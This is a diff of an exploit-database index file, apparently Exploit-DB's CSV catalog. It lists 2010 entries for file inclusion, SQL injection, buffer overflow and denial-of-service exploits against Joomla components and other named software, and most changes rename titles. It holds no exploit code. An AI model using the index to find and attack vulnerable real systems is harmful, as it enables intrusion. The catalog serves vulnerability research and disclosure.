12231,platforms/php/webapps/12231.txt,"Joomla! Component S5 Clan Roster com_s5clanroster - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12232,platforms/php/webapps/12232.txt,"Joomla! Component Photo Battle com_photobattle - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12233,platforms/php/webapps/12233.txt,"Joomla! Component MT Fire Eagle com_mtfireeagle - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12234,platforms/php/webapps/12234.txt,"Joomla! Component Media Mall Factory com_mediamall - Blind SQL Injection",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12235,platforms/php/webapps/12235.txt,"Joomla! Component Love Factory com_lovefactory - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12236,platforms/php/webapps/12236.txt,"Joomla! Component JA Comment com_jacomment - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12237,platforms/php/webapps/12237.txt,"Joomla! Component Delicious BookMarks com_delicious - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12238,platforms/php/webapps/12238.txt,"Joomla! Component Deluxe Blog Factory com_blogfactory - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12239,platforms/php/webapps/12239.txt,"Joomla! Component BeeHeard Lite com_beeheard - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12230,platforms/php/webapps/12230.txt,"Joomla! Component 'com_wgpicasa' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12231,platforms/php/webapps/12231.txt,"Joomla! Component 'com_s5clanroster' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12232,platforms/php/webapps/12232.txt,"Joomla! Component 'com_photobattle' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12233,platforms/php/webapps/12233.txt,"Joomla! Component 'com_mtfireeagle' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12234,platforms/php/webapps/12234.txt,"Joomla! Component 'com_mediamall' - Blind SQL Injection",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12235,platforms/php/webapps/12235.txt,"Joomla! Component 'com_lovefactory' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12236,platforms/php/webapps/12236.txt,"Joomla! Component 'com_jacomment' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12237,platforms/php/webapps/12237.txt,"Joomla! Component 'com_delicious' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12238,platforms/php/webapps/12238.txt,"Joomla! Component 'com_blogfactory' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12239,platforms/php/webapps/12239.txt,"Joomla! Component 'com_beeheard' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow Denial of Service (PoC)",2010-04-14,mr_me,windows,dos,0
|
||||
15732,platforms/linux/dos/15732.txt,"FontForge - '.BDF' Font File Stack Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0
|
||||
12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0
|
||||
|
@ -11191,7 +11191,7 @@ id,file,description,date,author,platform,type,port
|
|||
12244,platforms/windows/remote/12244.txt,"iMesh 7.1.0.x - 'IMWeb.dll 7.0.0.x' Remote Heap Overflow",2007-12-18,rgod,windows,remote,0
|
||||
20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0
|
||||
12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script - buyers_subcategories SQL Injection",2010-04-15,"AnGrY BoY",php,webapps,0
|
||||
12246,platforms/php/webapps/12246.txt,"Joomla! Component com_iproperty 1.5.3 - 'id' SQL Injection",2010-04-15,v3n0m,php,webapps,0
|
||||
12246,platforms/php/webapps/12246.txt,"Joomla! Component 'com_iproperty' 1.5.3 - 'id' Parameter SQL Injection",2010-04-15,v3n0m,php,webapps,0
|
||||
12247,platforms/windows/remote/12247.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetFileClose Exploit (Universal)",2010-04-15,dookie,windows,remote,0
|
||||
12248,platforms/windows/remote/12248.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetConnectionEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0
|
||||
12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion",2010-04-15,eidelweiss,php,webapps,0
|
||||
|
@ -11201,7 +11201,7 @@ id,file,description,date,author,platform,type,port
|
|||
12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (1)",2010-04-16,Mr.MLL,php,webapps,0
|
||||
12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (Metasploit)",2010-04-16,blake,windows,local,0
|
||||
12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",php,webapps,0
|
||||
12257,platforms/php/webapps/12257.txt,"Joomla! Component com_manager 1.5.3 - 'id' SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
|
||||
12257,platforms/php/webapps/12257.txt,"Joomla! Component 'com_manager' 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
|
||||
12258,platforms/windows/dos/12258.py,"Microsoft Windows - SMB Client-Side Bug PoC (MS10-006)",2010-04-16,"laurent gaffie",windows,dos,0
|
||||
12259,platforms/php/dos/12259.php,"PHP 5.3.x - Denial of Service",2010-04-16,ITSecTeam,php,dos,0
|
||||
12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2010-04-16,JosS,php,webapps,0
|
||||
|
@ -11213,8 +11213,8 @@ id,file,description,date,author,platform,type,port
|
|||
12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)",2010-04-16,EL-KAHINA,php,webapps,0
|
||||
12267,platforms/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
|
||||
12268,platforms/php/webapps/12268.txt,"Uploader 0.7 - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
|
||||
12269,platforms/php/webapps/12269.txt,"Joomla! Component com_joltcard - SQL Injection",2010-04-16,Valentin,php,webapps,0
|
||||
12270,platforms/php/webapps/12270.txt,"Joomla! Component com_pandafminigames - SQL Injection",2010-04-16,Valentin,php,webapps,0
|
||||
12269,platforms/php/webapps/12269.txt,"Joomla! Component 'com_joltcard' - SQL Injection",2010-04-16,Valentin,php,webapps,0
|
||||
12270,platforms/php/webapps/12270.txt,"Joomla! Component 'com_pandafminigames' - SQL Injection",2010-04-16,Valentin,php,webapps,0
|
||||
12272,platforms/php/webapps/12272.txt,"PHP RapidKill Pro 5.x - Arbitrary File Upload",2010-04-17,DigitALL,php,webapps,0
|
||||
12273,platforms/windows/dos/12273.py,"Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow 10-020 (PoC)",2010-04-17,"laurent gaffie",windows,dos,0
|
||||
12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ - Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0
|
||||
|
@ -11223,16 +11223,16 @@ id,file,description,date,author,platform,type,port
|
|||
12278,platforms/php/webapps/12278.txt,"Alegro 1.2.1 - SQL Injection",2010-04-18,indoushka,php,webapps,0
|
||||
12279,platforms/php/webapps/12279.txt,"eclime 1.1 - Bypass / Create and Download Backup",2010-04-18,indoushka,php,webapps,0
|
||||
12280,platforms/php/webapps/12280.txt,"dl_stats - Multiple Vulnerabilities",2010-04-18,"Valentin Hoebel",php,webapps,0
|
||||
12282,platforms/php/webapps/12282.txt,"Joomla! Component Archery Scores (com_archeryscores) 1.0.6 - Local File Inclusion",2010-04-18,"wishnusakti + inc0mp13te",php,webapps,0
|
||||
12283,platforms/php/webapps/12283.txt,"Joomla! Component ZiMB Comment com_zimbcomment - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12284,platforms/php/webapps/12284.txt,"Joomla! Component ZiMB Manager com_zimbcore - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12285,platforms/php/webapps/12285.txt,"Joomla! Component Gadget Factory com_gadgetfactory - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12286,platforms/php/webapps/12286.txt,"Joomla! Component Matamko com_matamko - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12287,platforms/php/webapps/12287.txt,"Joomla! Component Multiple Root com_multiroot - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12288,platforms/php/webapps/12288.txt,"Joomla! Component Multiple Map com_multimap - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12289,platforms/php/webapps/12289.txt,"Joomla! Component Contact Us Draw Root Map com_drawroot - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12290,platforms/php/webapps/12290.txt,"Joomla! Component Contact Us Google Map com_google - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12291,platforms/php/webapps/12291.txt,"Joomla! Component iF surfALERT com_if_surfalert - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12282,platforms/php/webapps/12282.txt,"Joomla! Component 'com_archeryscores' 1.0.6 - Local File Inclusion",2010-04-18,"wishnusakti + inc0mp13te",php,webapps,0
|
||||
12283,platforms/php/webapps/12283.txt,"Joomla! Component 'com_zimbcomment' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12284,platforms/php/webapps/12284.txt,"Joomla! Component 'com_zimbcore' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12285,platforms/php/webapps/12285.txt,"Joomla! Component 'com_gadgetfactory' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12286,platforms/php/webapps/12286.txt,"Joomla! Component 'com_matamko' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12287,platforms/php/webapps/12287.txt,"Joomla! Component 'com_multiroot' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12288,platforms/php/webapps/12288.txt,"Joomla! Component 'com_multimap' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12289,platforms/php/webapps/12289.txt,"Joomla! Component 'com_drawroot' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12290,platforms/php/webapps/12290.txt,"Joomla! Component 'com_google' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12291,platforms/php/webapps/12291.txt,"Joomla! Component 'com_if_surfalert' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
|
||||
12292,platforms/php/webapps/12292.txt,"Flex File Manager - Arbitrary File Upload",2010-04-19,Mr.MLL,php,webapps,0
|
||||
12293,platforms/windows/local/12293.py,"TweakFS 1.0 - (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0
|
||||
12294,platforms/windows/dos/12294.txt,"avtech software 'avc781viewer.dll' ActiveX - Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0
|
||||
|
@ -11240,13 +11240,13 @@ id,file,description,date,author,platform,type,port
|
|||
12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-19,"cr4wl3r ",php,webapps,0
|
||||
12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c - Denial of Service / Modem Reset",2010-04-19,hkm,hardware,dos,0
|
||||
12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0
|
||||
12299,platforms/php/webapps/12299.txt,"Joomla! Component GBU FACEBOOK 1.0.5 - SQL Injection",2010-04-19,kaMtiEz,php,webapps,0
|
||||
12299,platforms/php/webapps/12299.txt,"Joomla! Component 'com_gbufacebook' 1.0.5 - SQL Injection",2010-04-19,kaMtiEz,php,webapps,0
|
||||
12301,platforms/php/webapps/12301.txt,"CMS Ariadna 2009 - SQL Injection",2010-04-19,"Andrés Gómez",php,webapps,0
|
||||
12302,platforms/windows/dos/12302.html,"HP Operations Manager 8.16 - 'srcvw4.dll' LoadFile()/SaveFile() Remote Unicode Stack Overflow (PoC)",2010-04-20,mr_me,windows,dos,0
|
||||
12303,platforms/php/webapps/12303.pl,"MusicBox 3.3 - SQL Injection",2010-04-20,Ctacok,php,webapps,0
|
||||
12304,platforms/multiple/remote/12304.txt,"Multi-Threaded HTTP Server 1.1 - Directory Traversal (1)",2010-04-20,chr1x,multiple,remote,0
|
||||
12305,platforms/php/webapps/12305.txt,"Joomla! Component com_jnewspaper - 'cid' SQL Injection",2010-04-20,"Don Tukulesto",php,webapps,0
|
||||
12306,platforms/php/webapps/12306.txt,"Joomla! Component JTM Reseller 1.9 Beta - SQL Injection",2010-04-20,kaMtiEz,php,webapps,0
|
||||
12305,platforms/php/webapps/12305.txt,"Joomla! Component 'com_jnewspaper' - 'cid' Parameter SQL Injection",2010-04-20,"Don Tukulesto",php,webapps,0
|
||||
12306,platforms/php/webapps/12306.txt,"Joomla! Component 'com_jtm' 1.9 Beta - SQL Injection",2010-04-20,kaMtiEz,php,webapps,0
|
||||
12308,platforms/windows/remote/12308.txt,"Multi-Threaded HTTP Server 1.1 - Source Disclosure",2010-04-20,Dr_IDE,windows,remote,0
|
||||
12309,platforms/windows/remote/12309.txt,"Mongoose Web Server 2.8 - Multiple Directory Traversals",2010-04-20,Dr_IDE,windows,remote,0
|
||||
12310,platforms/windows/remote/12310.txt,"Acritum Femitter 1.03 - Directory Traversal",2010-04-20,Dr_IDE,windows,remote,0
|
||||
|
@ -11254,15 +11254,15 @@ id,file,description,date,author,platform,type,port
|
|||
12313,platforms/php/webapps/12313.txt,"Openregistrecil 1.02 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-20,"cr4wl3r ",php,webapps,0
|
||||
12314,platforms/windows/dos/12314.py,"Speed Commander 13.10 - '.zip' Memory Corruption",2010-04-20,TecR0c,windows,dos,0
|
||||
12315,platforms/php/webapps/12315.txt,"v2marketplacescript Upload_images Script (-7777) - Arbitrary File Upload",2010-04-21,cyberlog,php,webapps,0
|
||||
12316,platforms/php/webapps/12316.txt,"Joomla! Component wmi (com_wmi) - Local File Inclusion",2010-04-21,"wishnusakti + inc0mp13te",php,webapps,0
|
||||
12317,platforms/php/webapps/12317.txt,"Joomla! Component OrgChart com_orgchart - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0
|
||||
12318,platforms/php/webapps/12318.txt,"Joomla! Component Mms Blog com_mmsblog - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0
|
||||
12316,platforms/php/webapps/12316.txt,"Joomla! Component 'com_wmi' - Local File Inclusion",2010-04-21,"wishnusakti + inc0mp13te",php,webapps,0
|
||||
12317,platforms/php/webapps/12317.txt,"Joomla! Component 'com_orgchart' - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0
|
||||
12318,platforms/php/webapps/12318.txt,"Joomla! Component 'com_mmsblog' - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0
|
||||
12319,platforms/php/webapps/12319.txt,"e107 CMS 0.7.19 - Cross-Site Request Forgery",2010-04-21,"High-Tech Bridge SA",php,webapps,0
|
||||
12320,platforms/windows/remote/12320.txt,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Remote Buffer Overflow",2010-04-21,shinnai,windows,remote,0
|
||||
12322,platforms/php/webapps/12322.txt,"LightNEasy 3.1.x - Multiple Vulnerabilities",2010-04-21,ITSecTeam,php,webapps,0
|
||||
12323,platforms/php/webapps/12323.txt,"wb news (webmobo) 2.3.3 - Persistent Cross-Site Scripting",2010-04-21,ITSecTeam,php,webapps,0
|
||||
12324,platforms/multiple/dos/12324.py,"Multiple Browsers - Audio Tag Denial of Service",2010-04-21,"Chase Higgins",multiple,dos,0
|
||||
12325,platforms/php/webapps/12325.txt,"Joomla! Component com_portfolio - Local File Disclosure",2010-04-21,Mr.tro0oqy,php,webapps,0
|
||||
12325,platforms/php/webapps/12325.txt,"Joomla! Component 'com_portfolio' - Local File Disclosure",2010-04-21,Mr.tro0oqy,php,webapps,0
|
||||
12326,platforms/windows/local/12326.py,"ZipGenius 6.3.1.2552 - 'zgtips.dll' Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0
|
||||
12329,platforms/asp/webapps/12329.txt,"CactuShop - User Invoices Persistent Cross-Site Scripting",2010-04-21,7Safe,asp,webapps,0
|
||||
12330,platforms/php/webapps/12330.txt,"Apache OFBiz - Multiple Cross-Site Scripting",2010-04-21,"Lucas Apa",php,webapps,0
|
||||
|
@ -11274,7 +11274,7 @@ id,file,description,date,author,platform,type,port
|
|||
12337,platforms/windows/dos/12337.c,"Microsoft Windows 2000/XP/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0
|
||||
12338,platforms/php/webapps/12338.txt,"Cacti 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0
|
||||
12339,platforms/php/webapps/12339.txt,"Cacti 0.8.7e - OS Command Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0
|
||||
12340,platforms/php/webapps/12340.txt,"Joomla! Component com_caddy - Exploit",2010-04-22,_SuBz3r0_,php,webapps,0
|
||||
12340,platforms/php/webapps/12340.txt,"Joomla! Component 'com_caddy' - Exploit",2010-04-22,_SuBz3r0_,php,webapps,0
|
||||
12341,platforms/windows/dos/12341.txt,"EDraw Flowchart ActiveX Control 2.3 - (EDImage.ocx) Remote Denial of Service (IE)",2010-04-22,LiquidWorm,windows,dos,0
|
||||
12342,platforms/windows/local/12342.pl,"EDraw Flowchart ActiveX Control 2.3 - (.edd parsing) Remote Buffer Overflow (PoC)",2010-04-22,LiquidWorm,windows,local,0
|
||||
12343,platforms/multiple/remote/12343.txt,"Apache Tomcat 5.5.0 < 5.5.29 / 6.0.0 < 6.0.26 - Information Disclosure",2010-04-22,"Deniz Cevik",multiple,remote,0
|
||||
|
@ -11320,7 +11320,7 @@ id,file,description,date,author,platform,type,port
|
|||
12396,platforms/php/webapps/12396.txt,"OpenCominterne 1.01 - Local File Inclusion",2010-04-26,"cr4wl3r ",php,webapps,0
|
||||
12398,platforms/php/webapps/12398.txt,"Opencourrier 2.03beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-26,"cr4wl3r ",php,webapps,0
|
||||
12399,platforms/php/webapps/12399.txt,"Uiga Personal Portal - 'index.php' (view) SQL Injection",2010-04-26,41.w4r10r,php,webapps,0
|
||||
12400,platforms/php/webapps/12400.txt,"Joomla! Component com_joomradio - SQL Injection",2010-04-26,Mr.tro0oqy,php,webapps,0
|
||||
12400,platforms/php/webapps/12400.txt,"Joomla! Component 'com_joomradio' - SQL Injection",2010-04-26,Mr.tro0oqy,php,webapps,0
|
||||
12401,platforms/multiple/dos/12401.html,"WebKit 532.5 - Stack Exhaustion",2010-04-26,"Mathias Karlsson",multiple,dos,0
|
||||
12402,platforms/php/webapps/12402.txt,"Kasseler CMS 2.0.5 - Bypass / Download Backup",2010-04-26,indoushka,php,webapps,0
|
||||
12403,platforms/windows/local/12403.py,"IDEAL Administration 2010 10.2 - Local Buffer Overflow",2010-04-26,Dr_IDE,windows,local,0
|
||||
|
@ -11343,13 +11343,13 @@ id,file,description,date,author,platform,type,port
|
|||
12423,platforms/php/webapps/12423.txt,"CLScript.com Classifieds Software - SQL Injection",2010-04-27,41.w4r10,php,webapps,0
|
||||
12424,platforms/asp/webapps/12424.txt,"Acart 2.0 Shopping Cart - Software Backup Dump",2010-04-27,indoushka,asp,webapps,0
|
||||
12425,platforms/windows/dos/12425.html,"Webkit (Apple Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service",2010-04-27,Dr_IDE,windows,dos,0
|
||||
12426,platforms/php/webapps/12426.txt,"Joomla! Component Ultimate Portfolio com_ultimateportfolio - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
|
||||
12427,platforms/php/webapps/12427.txt,"Joomla! Component NoticeBoard com_noticeboard - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
|
||||
12428,platforms/php/webapps/12428.txt,"Joomla! Component SmartSite com_smartsite - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
|
||||
12429,platforms/php/webapps/12429.pl,"Joomla! Extension ABC com_abc - SQL Injection",2010-04-27,AntiSecurity,php,webapps,0
|
||||
12430,platforms/php/webapps/12430.txt,"Joomla! Component graphics (com_graphics) 1.0.6 - Local File Inclusion",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0
|
||||
12426,platforms/php/webapps/12426.txt,"Joomla! Component 'com_ultimateportfolio' - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
|
||||
12427,platforms/php/webapps/12427.txt,"Joomla! Component 'com_noticeboard' - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
|
||||
12428,platforms/php/webapps/12428.txt,"Joomla! Component 'com_smartsite' - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
|
||||
12429,platforms/php/webapps/12429.pl,"Joomla! Component 'com_abc' - SQL Injection",2010-04-27,AntiSecurity,php,webapps,0
|
||||
12430,platforms/php/webapps/12430.txt,"Joomla! Component 'com_graphics' 1.0.6 - Local File Inclusion",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0
|
||||
12431,platforms/windows/dos/12431.html,"Webmoney Advisor - ActiveX Remote Denial of Service",2010-04-28,Go0o$E,windows,dos,0
|
||||
12432,platforms/php/webapps/12432.txt,"Joomla! Component JE Property Finder - Arbitrary File Upload",2010-04-28,Sid3^effects,php,webapps,0
|
||||
12432,platforms/php/webapps/12432.txt,"Joomla! Component 'com_jesectionfinder' - Arbitrary File Upload",2010-04-28,Sid3^effects,php,webapps,0
|
||||
12433,platforms/cgi/webapps/12433.py,"NIBE heat pump - Remote Code Execution",2010-04-28,"Jelmer de Hen",cgi,webapps,0
|
||||
12434,platforms/cgi/webapps/12434.py,"NIBE heat pump - Local File Inclusion",2010-04-28,"Jelmer de Hen",cgi,webapps,0
|
||||
12435,platforms/php/webapps/12435.txt,"Zabbix 1.8.1 - SQL Injection",2010-04-01,"Dawid Golunski",php,webapps,0
|
||||
|
@ -11357,7 +11357,7 @@ id,file,description,date,author,platform,type,port
|
|||
12437,platforms/windows/dos/12437.html,"Apple Safari 4.0.3 / 4.0.4 - Stack Exhaustion",2010-04-28,"Fredrik Nordberg Almroth",windows,dos,0
|
||||
12438,platforms/php/webapps/12438.txt,"SoftBizScripts Dating Script - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0
|
||||
12439,platforms/php/webapps/12439.txt,"SoftBizScripts Hosting Script - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0
|
||||
12440,platforms/php/webapps/12440.txt,"Joomla! Component Wap4Joomla! - 'wapmain.php' SQL Injection",2010-04-28,Manas58,php,webapps,0
|
||||
12440,platforms/php/webapps/12440.txt,"Joomla! Component 'Wap4Joomla' - 'wapmain.php' SQL Injection",2010-04-28,Manas58,php,webapps,0
|
||||
12441,platforms/php/webapps/12441.html,"gpEasy 1.6.1 - Cross-Site Request Forgery (Add Admin)",2010-04-28,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0
|
||||
12442,platforms/php/webapps/12442.txt,"GeneShop 5.1.1 - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0
|
||||
12443,platforms/php/webapps/12443.txt,"Modelbook - 'casting_view.php' SQL Injection",2010-04-28,v3n0m,php,webapps,0
|
||||
|
@ -11382,20 +11382,20 @@ id,file,description,date,author,platform,type,port
|
|||
12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQL Injection",2010-04-30,Sid3^effects,php,webapps,0
|
||||
12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
|
||||
12464,platforms/asp/webapps/12464.txt,"ASPCode CMS 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0
|
||||
12465,platforms/php/webapps/12465.txt,"Joomla! Component com_newsfeeds - SQL Injection",2010-04-30,Archimonde,php,webapps,0
|
||||
12465,platforms/php/webapps/12465.txt,"Joomla! Component 'com_newsfeeds' - SQL Injection",2010-04-30,Archimonde,php,webapps,0
|
||||
12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion",2010-04-30,eidelweiss,php,webapps,0
|
||||
12467,platforms/php/webapps/12467.txt,"Webthaiapp - detail.php (cat) Blind SQL Injection",2010-04-30,Xelenonz,php,webapps,0
|
||||
12468,platforms/php/webapps/12468.txt,"Alibaba Clone Platinum - 'offers_buy.php' SQL Injection",2010-04-30,v3n0m,php,webapps,0
|
||||
12469,platforms/windows/local/12469.rb,"Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50 - '.zip' SEH Exploit",2010-04-30,Lincoln,windows,local,0
|
||||
12471,platforms/asp/webapps/12471.txt,"Comersus 8 Shopping Cart - SQL Injection / Cross-Site Request Forgery",2010-05-01,Sid3^effects,asp,webapps,0
|
||||
12472,platforms/php/webapps/12472.txt,"CF Image Host 1.1 - Remote File Inclusion",2010-05-01,The.Morpheus,php,webapps,0
|
||||
12473,platforms/php/webapps/12473.txt,"Joomla! Component Table JX - Cross-Site Scripting Vulnerabilities",2010-05-01,Valentin,php,webapps,0
|
||||
12474,platforms/php/webapps/12474.txt,"Joomla! Component Card View JX - Cross-Site Scripting",2010-05-01,Valentin,php,webapps,0
|
||||
12473,platforms/php/webapps/12473.txt,"Joomla! Component 'Table JX' - Cross-Site Scripting",2010-05-01,Valentin,php,webapps,0
|
||||
12474,platforms/php/webapps/12474.txt,"Joomla! Component 'Card View JX' - Cross-Site Scripting",2010-05-01,Valentin,php,webapps,0
|
||||
12475,platforms/php/webapps/12475.txt,"Opencatalogue 1.024 - Local File Inclusion",2010-05-01,"cr4wl3r ",php,webapps,0
|
||||
12476,platforms/php/webapps/12476.txt,"Opencimetiere 2.01 - Multiple Remote File Inclusion",2010-05-01,"cr4wl3r ",php,webapps,0
|
||||
12477,platforms/windows/dos/12477.txt,"Google Chrome 4.1.249.1064 - Remote Memory Corrupt",2010-05-01,eidelweiss,windows,dos,0
|
||||
12478,platforms/asp/webapps/12478.txt,"Mesut Manþet Haber 1.0 - Authentication Bypass",2010-05-02,LionTurk,asp,webapps,0
|
||||
12479,platforms/php/webapps/12479.txt,"Joomla! Extension DJ-Classifieds com_djClassifieds - Arbitrary File Upload",2010-05-02,Sid3^effects,php,webapps,0
|
||||
12479,platforms/php/webapps/12479.txt,"Joomla! 'com_djClassifieds' 0.9.1 - Arbitrary File Upload",2010-05-02,Sid3^effects,php,webapps,0
|
||||
12480,platforms/windows/remote/12480.txt,"Acritum Femitter Server 1.03 - Multiple Vulnerabilities",2010-05-02,"Zer0 Thunder",windows,remote,0
|
||||
12481,platforms/php/webapps/12481.txt,"WHMCS Control 2 - 'announcements.php' SQL Injection",2010-05-02,"Islam DefenDers",php,webapps,0
|
||||
12482,platforms/windows/dos/12482.py,"TFTPGUI - Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0
|
||||
|
@ -11447,7 +11447,7 @@ id,file,description,date,author,platform,type,port
|
|||
12533,platforms/php/webapps/12533.txt,"big.asp - SQL Injection",2010-05-08,Ra3cH,php,webapps,0
|
||||
12534,platforms/php/webapps/12534.txt,"PHP Link Manager 1.7 - URL Redirection",2010-05-08,ITSecTeam,php,webapps,0
|
||||
12535,platforms/php/webapps/12535.txt,"phpscripte24 Countdown Standart Rückwärts Auktions System - SQL Injection",2010-05-08,"Easy Laster",php,webapps,0
|
||||
12539,platforms/php/webapps/12539.txt,"Joomla! Component com_articleman - Arbitrary File Upload",2010-05-08,Sid3^effects,php,webapps,0
|
||||
12539,platforms/php/webapps/12539.txt,"Joomla! Component 'com_articleman' - Arbitrary File Upload",2010-05-08,Sid3^effects,php,webapps,0
|
||||
12540,platforms/windows/local/12540.rb,"IDEAL Migration 4.5.1 - Buffer Overflow (Metasploit)",2010-05-08,blake,windows,local,0
|
||||
12541,platforms/windows/dos/12541.php,"Dolphin 2.0 - '.elf' Local Denial Of Service",2010-05-09,"Yakir Wizman",windows,dos,0
|
||||
12542,platforms/php/webapps/12542.rb,"phpscripte24 Shop System - SQL Injection",2010-05-09,"Easy Laster",php,webapps,0
|
||||
|
@ -11479,12 +11479,12 @@ id,file,description,date,author,platform,type,port
|
|||
12571,platforms/asp/webapps/12571.txt,"e-webtech - 'page.asp' SQL Injection",2010-05-11,CoBRa_21,asp,webapps,0
|
||||
12572,platforms/php/webapps/12572.txt,"Free Advertisment CMS - 'user_info.php' SQL Injection",2010-05-11,XroGuE,php,webapps,0
|
||||
12573,platforms/windows/remote/12573.html,"Apple Safari 4.0.5 - parent.close() (memory Corruption) Code Execution",2010-05-11,"Krystian Kloskowski",windows,remote,0
|
||||
